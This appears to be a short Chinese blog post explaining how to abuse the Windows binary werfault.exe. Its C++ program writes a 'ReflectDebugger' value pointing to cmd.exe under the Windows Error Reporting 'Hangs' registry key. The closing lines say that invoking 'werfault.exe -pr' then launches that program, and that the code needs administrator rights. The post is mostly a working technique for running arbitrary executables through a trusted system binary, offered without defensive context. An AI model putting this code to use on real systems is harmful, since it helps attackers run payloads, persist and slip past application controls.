【系統白程式利用】werfault.exe
阿新 • • 發佈:2018-11-08
#include "stdafx.h"
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
// Get root key handle.
HKEY hRoot = nullptr;
LPCTSTR lpSubKey = L"Software\\Microsoft\\Windows\\Windows Error Reporting";
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, 0, KEY_ALL_ACCESS, &hRoot) != ERROR_SUCCESS)
{
wprintf(L"Open root key <%s> failed!\n" , lpSubKey);
}
// Create subKey.
HKEY hResult = nullptr;
lpSubKey = L"Hangs";
DWORD despostion = NULL;
if (RegCreateKeyEx(hRoot, lpSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hResult, &despostion) != ERROR_SUCCESS)
{
wprintf(L"Create key <%s> failed!\n" , lpSubKey);
}
else
{
if (despostion == REG_CREATED_NEW_KEY)
{
printf("Create new key successfuly!\n");
}
if (despostion == REG_OPENED_EXISTING_KEY)
{
printf("Opened new key successfuly!\n");
}
}
// Set subkey value.
LPCTSTR lpValueName = L"ReflectDebugger";
LPCTSTR lpData = L"c:\\windows\\system32\\cmd.exe";
if (RegSetValueEx(hResult, lpValueName, 0, REG_SZ, (const byte*)lpData, (_tcslen(lpData)+1) * sizeof(TCHAR)) != ERROR_SUCCESS)
{
printf("Set key value failed!\n");
return 0;
}
else
{
printf("Reg Add Successfully!\n");
}
system("pause");
return 0;
}
添加註冊表成功後,呼叫werfault.exe -pr ,werfault會啟動登錄檔中填寫的可執行程式。
上面程式碼需要用管理員許可權編譯執行